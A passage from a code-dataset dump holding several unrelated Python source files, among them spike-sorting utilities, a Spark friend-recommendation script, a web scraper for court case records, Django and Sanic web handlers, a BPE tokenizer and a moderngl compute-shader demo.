unit template correlations\n print('Computing unit template correlations...')\n all_correlations = []\n for i, unit_id1 in enumerate(unit_ids):\n template1 = full_templates[i, :, :]\n for j, unit_id2 in enumerate(unit_ids):\n if j <= i:\n continue\n template2 = full_templates[j, :, :]\n correlation = np.corrcoef(template1.ravel(), template2.ravel())[0, 1]\n all_correlations.append({\n 'unit_id1': unit_id1,\n 'unit_id2': unit_id2,\n 'correlation': correlation\n })\n kk = 20\n # Choose the best kk correlations for each unit\n unit_pair_ids = []\n for unit_id in unit_ids:\n correlations = [x for x in all_correlations if x['unit_id1'] == unit_id]\n correlations = sorted(correlations, key=lambda x: x['correlation'], reverse=True)\n for i in range(min(kk, len(correlations))):\n unit_pair_ids.append([correlations[i]['unit_id1'], correlations[i]['unit_id2']])\n print(f'Using {len(unit_pair_ids)} unit pairs for similarity comparison.')\n\n # Creating cross_correlograms.ccg\n print('Creating cross_correlograms.ns-ccg...')\n create_cross_correlograms(\n sorting=subsampled_sorting,\n unit_pairs=unit_pair_ids,\n output_path=f'{output_path}/cross_correlograms.ns-ccg'\n )\n\n # create spike_sorting_digest_info.json\n spike_sorting_digest_info = {\n 'channel_ids': channel_ids,\n 'sampling_frequency': float(recording.get_sampling_frequency()),\n 'num_frames': int(recording.get_num_frames()),\n 'unit_ids': unit_ids,\n 'unit_pair_ids': unit_pair_ids,\n 'channel_locations': serialize_channel_locations(recording.get_channel_locations())\n }\n print(f'Num. channels: {len(channel_ids)}')\n print(f'Num. units: {len(unit_ids)}')\n print(f'Num. unit pairs: {len(unit_pair_ids)}')\n print(f'Num. 
frames: {spike_sorting_digest_info[\"num_frames\"]}')\n with open(f'{output_path}/spike_sorting_digest_info.json', 'w') as f:\n json.dump(spike_sorting_digest_info, f, indent=2)\n\n print('Done creating spike sorting digest.')\n\ndef get_chunk_sizes_and_spacing(*,\n num_frames: int,\n sampling_frequency: float,\n segment_duration_sec: float,\n total_duration_sec: float\n):\n if total_duration_sec * sampling_frequency >= num_frames:\n # if the total duration is longer than the recording, then just use the entire recording\n return [num_frames], 0\n \n # use chunks of segment_duration_sec seconds\n chunk_size = int(sampling_frequency * min(segment_duration_sec, total_duration_sec))\n # the number of chunks depends on the total duration\n num_chunks = int(np.ceil(total_duration_sec * sampling_frequency / chunk_size))\n chunk_sizes = [chunk_size for i in range(num_chunks)]\n chunk_sizes[-1] = int(total_duration_sec * sampling_frequency - (num_chunks - 1) * chunk_size)\n if num_chunks == 1:\n # if only 1 chunk, then just use the initial chunk\n return chunk_sizes, 0\n else:\n # the spacing between the chunks\n spacing = int((num_frames - np.sum(chunk_sizes)) / (num_chunks - 1))\n return chunk_sizes, spacing\n\ndef get_subsampled_traces(\n recording, *,\n segment_duration_sec: float,\n total_duration_sec: float\n) -> npt.NDArray:\n import spikeinterface as si\n\n recording: si.BaseRecording = recording\n\n chunk_sizes, spacing = get_chunk_sizes_and_spacing(\n num_frames=recording.get_num_frames(),\n sampling_frequency=recording.sampling_frequency,\n segment_duration_sec=segment_duration_sec,\n total_duration_sec=total_duration_sec\n )\n\n num_chunks = len(chunk_sizes)\n if num_chunks == 1:\n # if only 1 chunk, then just use the initial chunk\n traces = recording.get_traces(start_frame=0, end_frame=int(total_duration_sec * recording.sampling_frequency))\n else:\n traces_list: list[np.ndarray] = []\n tt = 0\n for i in range(num_chunks):\n start_frame = tt\n end_frame = int(start_frame + chunk_sizes[i])\n traces_list.append(recording.get_traces(start_frame=start_frame, end_frame=end_frame))\n tt += int(chunk_sizes[i] + spacing)\n traces = np.concatenate(traces_list, axis=0)\n return traces\n\ndef get_subsampled_sorting(\n sorting, *,\n recording,\n segment_duration_sec: float,\n total_duration_sec: float,\n margin_num_frames: int = 100\n):\n import spikeinterface as si\n \n sorting: si.BaseSorting = sorting\n recording: si.BaseRecording = recording\n\n chunk_sizes, spacing = get_chunk_sizes_and_spacing(\n num_frames=recording.get_num_frames(),\n sampling_frequency=recording.sampling_frequency,\n segment_duration_sec=segment_duration_sec,\n total_duration_sec=total_duration_sec\n )\n\n spike_trains_dict = {}\n for unit_id in sorting.get_unit_ids():\n st = sorting.get_unit_spike_train(unit_id, segment_index=0)\n spike_times_list = []\n t_offset = 0\n for i in range(len(chunk_sizes)):\n start_frame = int(i * (chunk_sizes[i] + spacing))\n end_frame = int(start_frame + chunk_sizes[i])\n spike_times_list.append(st[(st >= start_frame + margin_num_frames) & (st < end_frame - margin_num_frames)] - start_frame + t_offset)\n t_offset += chunk_sizes[i]\n spike_times = np.concatenate(spike_times_list)\n spike_trains_dict[unit_id] = spike_times\n\n return si.NumpySorting.from_dict(\n [spike_trains_dict],\n sampling_frequency=recording.sampling_frequency\n )\n\ndef serialize_ids(ids: Union[list, npt.NDArray]) -> list:\n return [id if isinstance(id, str) else int(id) for id in ids]\n\ndef 
serialize_channel_locations(channel_locations: npt.NDArray) -> list:\n ret = []\n for m in range(channel_locations.shape[0]):\n ret.append({\n 'x': float(channel_locations[m, 0]),\n 'y': float(channel_locations[m, 1])\n })\n return ret","repo_name":"flatironinstitute/neurosift","sub_path":"python/neurosift/views/create_spike_sorting_digest.py","file_name":"create_spike_sorting_digest.py","file_ext":"py","file_size_in_byte":14775,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"29"} +{"seq_id":"815823832","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport sys\nimport re\nimport os\nfrom pyspark import SparkConf, SparkContext\n\n\n# In[2]:\n\n\nconf = SparkConf()\nsc = SparkContext(conf=conf)\nsc.setLogLevel('WARN')\n#loc = \"./soc-LiveJournal1Adj.txt\"\nloc = sys.argv[1]\n\nlines = sc.textFile(loc, 1)\n\n\n# In[3]:\n\n\n## all modified lines are appended to list for easy debugging\nline=list()\nline.append(lines.map(lambda l: re.split('\\t',l)))\nline.append(line[-1].mapValues(lambda l: re.split(',', l)))\nline.append(line[-1].filter(lambda x: x[1][0]!=''))\nline.append(line[-1].flatMap(lambda x: [(x[0],item) for item in x[1]]))\nline.append(line[-1].map(lambda x: (int(x[0]), int(x[1]))))\nline.append(line[-1].map(lambda x: (min(x[0], x[1]), max(x[0], x[1]))))\nline.append(line[-1].distinct().sortByKey())\nline.append(line[-1].groupByKey().mapValues(lambda x: set(x)))\n\n\n# In[4]:\n\n\ndic = line[-1].collectAsMap()\n\n\n# In[14]:\n\n\n## function get_friend returns key-value pair of \n## target and friend's friend list\ndef get_friend(pair):\n target = pair[0]\n friend = pair[1]\n #friend: set, dic: friend dictionary\n #global dic\n #dic = {1: {2, 3, 4}, 2: {3, 5}, 3: {}}\n friendnearby = set()\n for f in friend:\n try:\n ff = dic[f]\n friendnearby=friendnearby.union(ff)\n except KeyError:\n pass\n friendnearby=friendnearby.difference(friend)\n friendnearbylist = list(friendnearby)\n friendnearbylist.sort()\n \n return (target, friendnearbylist)\n\n\n# In[6]:\n\n\nfriend=list()\nfriend.append(line[-1].map(get_friend))\nfriend.append(friend[-1].flatMap(lambda x: [(x[0],item) for item in x[1]]))\n\n\n# In[7]:\n\n\n## this function returns possible pairs\ndef get_mutual(pair):\n f1 = pair[0]\n f2 = pair[1]\n try:\n intersect = dic[f1]&dic[f2]\n count = len(intersect)\n except KeyError:\n count = 0\n return (count, (f1, f2))\n \n\n\n# In[8]:\n\n\nfriend.append(friend[-1].map(get_mutual))\nfriend.append(friend[-1].groupByKey() .mapValues(lambda x: list(x)).sortByKey(ascending=0))\n\n\n# In[9]:\n\n\ndef sort_ppl(x):\n count = x[0]\n ppl_list = x[1]\n sorted_list = sorted(ppl_list, key=lambda tup: tup[0])\n \n return (count, sorted_list)\n\n\n# In[10]:\n\n\nfriend.append(friend[-1].map(sort_ppl))\nfriend.append(friend[-1].flatMap(lambda x: [(x[0],item) for item in x[1]]))\nfriend.append(friend[-1].map(lambda x: (x[1][0], x[1][1], x[0])))\nfriend.append(friend[-1].filter(lambda x: x[2]>0))\n\n\n# In[11]:\n\n\n#output is saved as txt to check output easily\ndef save(filename, contents):\n fh = open(filename, 'w')\n fh.write(contents)\n fh.close()\n\n\n# In[12]:\n\ncount=0\nst=''\nresult = friend[-1].collect()\nfor t in result:\n st+=str(t[0])\n st+='\\t'\n st+=str(t[1])\n st+='\\t'\n st+=str(t[2])\n st+='\\n'\n if(count<10):\n print(str(t[0]),'\\t',str(t[1]),'\\t',str(t[2]))\n count+=1\nsave('hw1-1.txt', st)\n\n\n# In[13]:\n\n# time needed for all this process: 
12s\nsc.stop()\n\n","repo_name":"jyparkkr/bigdata_analysis","sub_path":"HW1/python files/hw1_1.py","file_name":"hw1_1.py","file_ext":"py","file_size_in_byte":3050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"7692453752","text":"import asyncio\n\nimport aio_pika\nimport json\n\nfrom logging import getLogger\nfrom typing import TYPE_CHECKING, Optional\nfrom yarl import URL\n\nfrom app.base.base_accessor import BaseAccessor\nfrom app.store.vk_api.dataclasses import Update\n\nif TYPE_CHECKING:\n from app.web.app import Application\n\n\nclass RabbitAccessor(BaseAccessor):\n def __init__(self, app: \"Application\", *args, **kwargs):\n super().__init__(app, *args, **kwargs)\n self.logger = getLogger(\"rabbit_accessor\")\n self.rabbit_connection: Optional[aio_pika.Connection] = None\n self.rabbit_channel: Optional[aio_pika.Channel] = None\n self.rabbit_queue: Optional[aio_pika.Queue] = None\n\n async def connect(self, app: \"Application\"):\n rabbit_url = URL.build(\n scheme=\"amqp\",\n user=self.app.config.rabbit.user,\n password=self.app.config.rabbit.password,\n host=self.app.config.rabbit.host,\n port=self.app.config.rabbit.port,\n path=self.app.config.rabbit.vhost,\n )\n self.rabbit_connection = await aio_pika.connect_robust(rabbit_url)\n self.rabbit_channel = await self.rabbit_connection.channel()\n self.rabbit_queue: aio_pika.abc.AbstractQueue = await self.rabbit_channel.declare_queue(self.app.config.rabbit.queue)\n await self.rabbit_queue.consume(self.on_message, no_ack=True)\n\n async def on_message(self, message):\n if message:\n await self.app.store.bots_manager.handle_updates(json.loads(message.body.decode())[0])\n\n async def disconnect(self, app: \"Application\"):\n if self.rabbit_channel:\n await self.rabbit_channel.close()\n if self.rabbit_connection:\n await self.rabbit_connection.close()\n\n async def rabbit_produce(self, updates: list[Update]):\n await self.rabbit_channel.default_exchange.publish(\n aio_pika.Message(body=bytes(json.dumps(updates), \"utf-8\")), routing_key=self.app.config.rabbit.queue\n )\n","repo_name":"Alsiri0n/amigos","sub_path":"app/store/rabbit/accessor.py","file_name":"accessor.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"31918755247","text":"import requests\nfrom bs4 import BeautifulSoup\nimport csv\n# import pandas as pd\nheaders ={'User-Agent':'Mozilla/5.0','Referer': 'https://main.sci.gov.in/case-status'}\n\ncaptcha_url ='https://main.sci.gov.in/php/captcha_num.php'\nr = requests.get(captcha_url)\ncap=r.text\n# print(cap)\nfile='data.csv'\n\nwith open(file,'a',newline='') as f:\n writer = csv.DictWriter(f, fieldnames =['Diary No.','Case No.' ,'Present/Last Listed On','Status/Stage','Disp.Type','Category','Act','Petitioner(s)','Respondent(s)','Pet. Advocate(s)','Resp. 
Advocate(s)','U/Section'])\n writer.writeheader()\n\nfor Dnum in range(1,11):\n for Dyr in range(2000,2021):\n CaseDiaryNumber = {\n \"d_no\": Dnum,\n \"d_yr\":Dyr,\n \"ansCaptcha\":cap\n }\n\n url = 'https://main.sci.gov.in/php/case_status/case_status_process.php'\n\n number =requests.post(url,data=CaseDiaryNumber,headers=headers)\n soup = BeautifulSoup(number.content,'lxml')\n\n tables =soup.find('table')\n td = tables.find_all('td')\n tdata=[]\n for j in range(len(td)):\n if j%2 !=0:\n tdata.append(td[j].text.strip())\n \n with open(file, 'a',newline='') as f:\n writer = csv.writer(f)\n writer.writerow(tdata)\n\n\n\n\n\n\n\n","repo_name":"Rohanmore491/VALUEPITCH_TASK","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"20494744795","text":"from django.shortcuts import render, redirect\nfrom models import User, Quote\nfrom django.contrib import messages\nfrom django.db.models import Count\n\n# Create your views here.\ndef index(request):\n\n return render(request, 'exam/index.html')\n\ndef register(request):\n if request.method == \"POST\":\n user = User.objects.register(request.POST)\n if 'errors' in user:\n for error in user['errors']:\n messages.error(request, error)\n return redirect('/')\n if 'theuser' in user:\n request.session['theuser'] = user['theuser']\n request.session['userid'] = user['userid']\n return redirect('/quotes')\n\ndef login(request):\n if request.method == \"POST\":\n user = User.objects.login(request.POST)\n if 'errors' in user:\n for error in user['errors']:\n messages.error(request, error)\n return redirect('/')\n if 'theuser' in user:\n request.session['theuser'] = user['theuser']\n request.session['userid'] = user['userid']\n return redirect('/quotes')\n\ndef logout(request):\n del request.session['theuser']\n del request.session['userid']\n return redirect('/')\n\ndef quotes(request):\n all_quotes = Quote.objects.exclude(favorite=request.session['userid'])\n favorite_quotes = Quote.objects.filter(favorite=request.session['userid'])\n context={\n 'all' : all_quotes,\n 'fav' : favorite_quotes\n }\n return render(request, 'exam/quotes.html', context)\n\ndef addquote(request):\n if request.method =='POST':\n quote = Quote.objects.add(request.POST, request.session['userid'])\n if 'errors' in quote:\n for error in quote['errors']:\n messages.error(request, error)\n redirect ('/quotes')\n return redirect('/quotes')\n\ndef favorite(request, id):\n this_quote= Quote.objects.get(id=id)\n favorite = User.objects.get(id=request.session['userid'])\n this_quote.favorite.add(favorite)\n this_quote.save()\n return redirect('/quotes')\n\ndef unfavorite(request, id):\n this_quote= Quote.objects.get(id=id)\n favorite = User.objects.get(id=request.session['userid'])\n this_quote.favorite.remove(favorite)\n this_quote.save()\n return redirect('/quotes')\n\ndef user(request, id):\n my_quotes= Quote.objects.filter(posted__id=id)\n context={\n 'quote' :my_quotes,\n 'user' :User.objects.get(id=id),\n 'count' :Quote.objects.annotate(qcount=Count('quote')).filter(posted__id=id)\n }\n return render(request, 'exam/user.html', context)\n","repo_name":"tizme/retake","sub_path":"apps/exam/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"9139953443","text":"\"\"\"Request handlers for the /users 
endpoint.\"\"\"\n\nfrom sanic import response\nfrom sqlalchemy.exc import IntegrityError\n\nfrom . import APIError, Endpoint\nfrom ...db import user\nfrom ..resource import validate\nfrom ..resource.user import GetUserResponse, PostUsersRequest, PutUserRequest\n\n\nclass UserEndpoint(Endpoint):\n \"\"\"Handles requests to /users/.\"\"\"\n\n __uri__ = \"/users/\"\n\n @validate(None, GetUserResponse)\n async def get(self, _, username):\n \"\"\"Handles a GET /users/ request by returning the user with\n the given username.\"\"\"\n # Fetch user data from DB\n user_data = user.select(self.server.db_session, username)\n if not user_data:\n # Failed to find a user with that username\n raise APIError('No such user', status=404)\n return response.json(user_data, status=200)\n\n @validate(PutUserRequest, GetUserResponse)\n async def put(self, request, username):\n \"\"\"Handles a PUT /users/ request by updating the user with\n the given username and returning the updated user info.\"\"\"\n body = request.json\n updated_user = user.update(\n self.server.db_session,\n username,\n full_name=body.get('full_name', None),\n email=body.get('email', None))\n return response.json(updated_user, status=200)\n\n async def delete(self, _, username):\n \"\"\"Handles a DELETE /users/ request by deleting the user with\n the given username. \"\"\"\n user.delete(self.server.db_session, username)\n return response.text('', status=204)\n\n\nclass UsersEndpoint(Endpoint):\n \"\"\"Handles requests to /users.\"\"\"\n\n __uri__ = '/users'\n\n @validate(PostUsersRequest, None)\n async def post(self, request):\n \"\"\"Handles a POST /users request by creating a new user.\"\"\"\n # Put the user in the DB\n body = request.json\n try:\n user.insert(self.server.db_session, body['full_name'],\n body['username'], body['email'])\n except IntegrityError:\n raise APIError('User already exists', status=400)\n return response.text('', status=201)\n","repo_name":"ginsstaahh/bounce","sub_path":"bounce/server/api/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"29"} +{"seq_id":"34841625769","text":"import numpy as np\nimport torch\nfrom typing import List\nfrom rdkit import Chem\n\nfrom coati.containers.rdkit_utils import mol_to_atoms_coords\nfrom coati.models.encoding.clip_e2e import e3gnn_smiles_clip_e2e\nfrom coati.models.encoding.tokenizers.trie_tokenizer import TrieTokenizer\n\n\ndef embed_points(s: str, encoder: e3gnn_smiles_clip_e2e) -> torch.Tensor:\n V0_atoms, V0_coords = mol_to_atoms_coords(s)\n with torch.no_grad():\n V0 = torch.from_numpy(\n encoder.encode_points(\n torch.tensor(V0_atoms, device=encoder.device).unsqueeze(0).float(),\n torch.tensor(V0_coords, device=encoder.device).unsqueeze(0).float(),\n )\n .detach()\n .cpu()\n .numpy()\n ).cuda()\n return V0\n\n\ndef embed_smiles(\n s: str, encoder: e3gnn_smiles_clip_e2e, tokenizer: TrieTokenizer\n) -> torch.Tensor:\n s = Chem.MolToSmiles(Chem.MolFromSmiles(s))\n with torch.no_grad():\n try:\n batch_tokens = torch.tensor(\n [tokenizer.tokenize_text(\"[SMILES]\" + s + \"[STOP]\", pad=True)],\n device=encoder.device,\n dtype=torch.int,\n )\n batch_embeds = encoder.encode_tokens(batch_tokens, tokenizer)\n except Exception as Ex:\n print(\"embed_smiles exception: \", Ex)\n return batch_embeds[0]\n\ndef embed_smiles_batch(smiles_list: List[str], encoder: e3gnn_smiles_clip_e2e, tokenizer: TrieTokenizer) -> torch.Tensor:\n batch_tokens = torch.tensor(\n 
[tokenizer.tokenize_text(\"[SMILES]\" + s + \"[STOP]\", pad=True) for s in smiles_list],\n device=encoder.device,\n dtype=torch.int,\n )\n batch_embeds = encoder.encode_tokens(batch_tokens, tokenizer)\n return batch_embeds\n\ndef purify_vector(\n V: torch.Tensor, encoder: e3gnn_smiles_clip_e2e, tokenizer: TrieTokenizer, n_rep=128\n) -> torch.Tensor:\n \"\"\"\n purification is usually the name given to an operation which\n pulls out the idempotent part of a vector under a map.\n\n for example gs dm satisfies P**2 - P =0\n Purification of density matrix:\n min(tr((P^2-p)**2))\n\n Can we purify a coati vector? The issue is the decoding process\n isn't deterministic or differentiable.\n We would like to ensure:\n vector = embed(decode(vector)) which is also:\n 0 = embed(decode(vector)) - vector\n\n Can we enforce this via a gradient like step?\n I'm going to try the punt-version which just pushes vector\n towards the average of embed(decode(vector))\n\n Args:\n V (batch X embed_dim)\n \"\"\"\n with torch.no_grad():\n try:\n regen_smiles = encoder.hclip_to_2d_batch(\n V.to(encoder.device).unsqueeze(0).repeat(n_rep, 1), tokenizer\n )\n except Exception as Ex:\n return V\n batch_tokens_ = []\n for S in regen_smiles:\n try:\n S = Chem.MolToSmiles(Chem.MolFromSmiles(S))\n batch_tokens_.append(\n tokenizer.tokenize_text(\"[SMILES]\" + S + \"[STOP]\", pad=True)\n )\n except Exception as Ex:\n pass\n if len(batch_tokens_) < 1:\n return V\n batch_tokens = torch.tensor(\n batch_tokens_, device=encoder.device, dtype=torch.long\n )\n batch_embeds = encoder.encode_tokens(batch_tokens, tokenizer)\n return batch_embeds.mean(0)\n\n\ndef force_decode_valid(\n V: torch.Tensor,\n encoder: e3gnn_smiles_clip_e2e,\n tokenizer: TrieTokenizer,\n max_attempts: int = 2000,\n) -> str:\n \"\"\"\n Continues decoding until a valid SMILES string is produced.\n \"\"\"\n for attempt in range(max_attempts):\n with torch.no_grad():\n try:\n regen_smiles = encoder.hclip_to_2d(V, tokenizer)\n mol = Chem.MolFromSmiles(regen_smiles)\n if not mol is None:\n return regen_smiles\n except Exception as Ex:\n # print(Ex)\n pass\n return \"C\"\n\n\ndef force_decode_valid_batch(\n V: torch.Tensor,\n encoder: e3gnn_smiles_clip_e2e,\n tokenizer: TrieTokenizer,\n batch_size: int = 128,\n max_attempts: int = 4,\n) -> str:\n \"\"\"\n Attemps multiple parallel decodings until a valid SMILES string is produced.\n If multiple valid SMILES strings are produced, returns the most common one.\n \"\"\"\n for k in range(max_attempts):\n try:\n with torch.no_grad():\n regen_smiles = encoder.hclip_to_2d_batch(\n V.unsqueeze(0).repeat(batch_size, 1), tokenizer\n )\n slist = []\n for S in regen_smiles:\n try:\n mol = Chem.MolFromSmiles(S)\n if not mol is None:\n slist.append(Chem.MolToSmiles(mol))\n except Exception as Ex:\n print(Ex)\n pass\n if len(slist):\n return slist[np.argmax([slist.count(S) for S in slist])]\n else:\n continue\n except Exception as Ex:\n continue\n return \"C\"\n","repo_name":"terraytherapeutics/COATI","sub_path":"coati/generative/coati_purifications.py","file_name":"coati_purifications.py","file_ext":"py","file_size_in_byte":5208,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"29"} +{"seq_id":"3981536890","text":"import struct\n\nclass BPE:\n\tdef __init__(self):\n\t\tself.all_seq = []\n\t\tself.token_to_str = {}\n\t\tself.str_to_token = {}\n\t\tself.splits = set()\n\n\tdef save(self, fname):\n\t\tnum_entries = len(self.token_to_str)\n\t\twith open(fname, 'wb') as 
fout:\n\t\t\tfout.write(struct.pack('i', num_entries))\n\t\t\tfor t in self.token_to_str:\n\t\t\t\ts = self.token_to_str[t]\n\t\t\t\tfout.write(struct.pack('ii', t, len(s)))\n\t\t\t\tfout.write(s.encode('charmap'))\n\n\tdef load(self, fname):\n\t\tself.token_to_str = {}\n\t\tself.str_to_token = {}\n\t\twith open(fname, 'rb') as fin:\n\t\t\tnum_entries = struct.unpack('i', fin.read(4))[0]\n\t\t\tfor e in range(num_entries):\n\t\t\t\tt, s_len = struct.unpack('ii', fin.read(8))\n\t\t\t\ts = fin.read(s_len).decode('charmap')\n\t\t\t\tself.token_to_str[t] = s\n\t\t\t\tself.str_to_token[s] = t\n\n\tdef encode(self, sentence):\n\t\tall_strs = sorted(self.str_to_token.keys(), key=len, reverse=True)\n\t\ttokens = [sentence]\n\t\tfor s in all_strs:\n\t\t\tneeds_loop = True\n\t\t\twhile needs_loop:\n\t\t\t\tneeds_loop = False\n\t\t\t\tnew_tokens = []\n\t\t\t\tfor t in tokens:\n\t\t\t\t\tif (type(t) is str) and (s in t):\n\t\t\t\t\t\ti = t.index(s)\n\t\t\t\t\t\tj = i + len(s)\n\t\t\t\t\t\tif i > 0:\n\t\t\t\t\t\t\tnew_tokens.append(t[:i])\n\t\t\t\t\t\tnew_tokens.append(self.str_to_token[s])\n\t\t\t\t\t\tif j < len(t):\n\t\t\t\t\t\t\tnew_tokens.append(t[j:])\n\t\t\t\t\t\tneeds_loop = True\n\t\t\t\t\telse:\n\t\t\t\t\t\tnew_tokens.append(t)\n\t\t\t\ttokens = new_tokens\n\t\treturn tokens\n\n\tdef decode(self, tokens):\n\t\treturn ''.join([self.token_to_str[t] for t in tokens])\n\n\tdef add_seq(self, seq):\n\t\ttokens = []\n\t\tfor c in seq:\n\t\t\tif c not in self.str_to_token:\n\t\t\t\tnum_tokens = len(self.token_to_str)\n\t\t\t\tself.str_to_token[c] = num_tokens\n\t\t\t\tself.token_to_str[num_tokens] = c\n\t\t\ttokens.append(self.str_to_token[c])\n\t\tself.all_seq.append(tokens)\n\n\tdef set_merges(self, merges):\n\t\tself.splits = set()\n\t\tfor s in self.str_to_token:\n\t\t\tif s not in merges:\n\t\t\t\tself.splits.add(self.str_to_token[s])\n\n\tdef count_pairs(self):\n\t\tpair_counts = {}\n\t\tfor seq in self.all_seq:\n\t\t\tfor i in range(len(seq) - 1):\n\t\t\t\ta = seq[i]\n\t\t\t\tif a in self.splits:\n\t\t\t\t\tcontinue\n\t\t\t\tb = seq[i + 1]\n\t\t\t\tif b in self.splits:\n\t\t\t\t\tcontinue\n\t\t\t\tpair = (a, b)\n\t\t\t\tif pair not in pair_counts:\n\t\t\t\t\tpair_counts[pair] = 1\n\t\t\t\telse:\n\t\t\t\t\tpair_counts[pair] += 1\n\t\treturn pair_counts\n\n\tdef max_pair(self, pairs):\n\t\tv = list(pairs.values())\n\t\tk = list(pairs.keys())\n\t\treturn k[v.index(max(v))]\n\n\tdef pair_to_str(self, pair):\n\t\treturn self.token_to_str[pair[0]] + self.token_to_str[pair[1]]\n\n\tdef apply_pair_encode(self, pair):\n\t\tnew_token = len(self.token_to_str)\n\t\tnew_str = self.pair_to_str(pair)\n\t\tself.token_to_str[new_token] = new_str\n\t\tself.str_to_token[new_str] = new_token\n\t\tfor i in range(len(self.all_seq)):\n\t\t\tseq = self.all_seq[i]\n\t\t\tnew_seq = []\n\t\t\tj = 0\n\t\t\twhile j < len(seq):\n\t\t\t\tif j < len(seq) - 1 and pair == (seq[j], seq[j + 1]):\n\t\t\t\t\tnew_seq.append(new_token)\n\t\t\t\t\tj += 1\n\t\t\t\telse:\n\t\t\t\t\tnew_seq.append(seq[j])\n\t\t\t\tj += 1\n\t\t\tself.all_seq[i] = new_seq\n\n\tdef embed_step(self):\n\t\tpairs = self.count_pairs()\n\t\tpair = self.max_pair(pairs)\n\t\tprint(self.pair_to_str(pair), pairs[pair])\n\t\tif pairs[pair] > 1:\n\t\t\tself.apply_pair_encode(pair)\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef embed(self, num_tokens):\n\t\twhile len(self.token_to_str) < num_tokens:\n\t\t\tif not self.embed_step():\n\t\t\t\tbreak\n\t\treturn 
len(self.token_to_str)\n","repo_name":"HackerPoet/ClassMaker","sub_path":"bpe.py","file_name":"bpe.py","file_ext":"py","file_size_in_byte":3255,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"29"} +{"seq_id":"799022024","text":"import os\nimport openai\n\n\nopenai.api_key = \"sk-UbuY8SXXXXXX-youropenai-key\"\n\n\nresponse = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\n \"role\": \"system\",\n \"content\": \"As a advance seo blog writer \"\n },\n {\n \"role\": \"user\",\n \"content\": \"write on blog chatgpt\"\n },\n {\n \"role\": \"assistant\",\n \"content\": \"\"\n }\n ],\n temperature=1,\n max_tokens=4000,\n top_p=1,\n frequency_penalty=0,\n presence_penalty=0\n)\n\nprint(response[\"choices\"][0][\"message\"][\"content\"])\n","repo_name":"kumar1shailesh/TextGen-PyChatGpt","sub_path":"TextGen-PyChatGpt-basiccode.py","file_name":"TextGen-PyChatGpt-basiccode.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"39142225696","text":"\n'''\nExample of using shader storage buffer in compute shader.\nWe read from a buffer and write the result to another buffer.\nEvery frame we swap the buffers around transforming positions\nof balls.\n\nBuffer.bind_to_storage_buffer is used to bind a buffer as storage buffer\nto a specific binding point specified in the compute program.\n\nIn addition we render the balls using a geometry shader to easily\nbatch draw them all in one render call.\n\nauthor: minu jeong\nmodified by: einarf\n'''\nimport math\nimport random\nimport numpy as np\nfrom ported._example import Example\n\n\nitems_vertex_shader_code = \"\"\"\n #version 430\n\n in vec4 in_vert;\n in vec4 in_col;\n\n out vec4 v_color;\n\n void main()\n {\n gl_Position = in_vert; // x, y, 0, radius\n v_color = in_col;\n }\n \"\"\"\n\n# Geometry shader turning the points into triangle strips.\n# This can also be done with point sprites.\nitems_geo_shader = \"\"\"\n #version 330\n\n layout(points) in;\n layout(triangle_strip, max_vertices=4) out;\n\n in vec4 v_color[];\n out vec2 uv;\n out vec4 color;\n\n void main() {\n float radius = gl_in[0].gl_Position.w;\n vec2 pos = gl_in[0].gl_Position.xy;\n\n // Emit the triangle strip creating a \"quad\"\n // Lower left\n gl_Position = vec4(pos + vec2(-radius, -radius), 0, 1);\n color = v_color[0];\n uv = vec2(0, 0);\n EmitVertex();\n\n // upper left\n gl_Position = vec4(pos + vec2(-radius, radius), 0, 1);\n color = v_color[0];\n uv = vec2(0, 1);\n EmitVertex();\n\n // lower right\n gl_Position = vec4(pos + vec2(radius, -radius), 0, 1);\n color = v_color[0];\n uv = vec2(1, 0);\n EmitVertex();\n\n // upper right\n gl_Position = vec4(pos + vec2(radius, radius), 0, 1);\n color = v_color[0];\n uv = vec2(1, 1);\n EmitVertex();\n\n EndPrimitive();\n }\n\"\"\"\n\nitems_fragment_shader_code = \"\"\"\n #version 430\n\n in vec2 uv;\n in vec4 color;\n out vec4 out_color;\n void main()\n {\n // Calculate the length from the center of the \"quad\"\n // using texture coordinates discarding fragments\n // further away than 0.5 creating a circle.\n if (length(vec2(0.5, 0.5) - uv.xy) > 0.5)\n {\n discard;\n }\n out_color = color;\n }\n\"\"\"\n\n# calc position with compute shader\ncompute_worker_shader_code = \"\"\"\n#version 430\n#define GROUP_SIZE %COMPUTE_SIZE%\n\nlayout(local_size_x=GROUP_SIZE) in;\n\n// All values are vec4s because of block alignment rules (keep it simple).\n// We could also declare all 
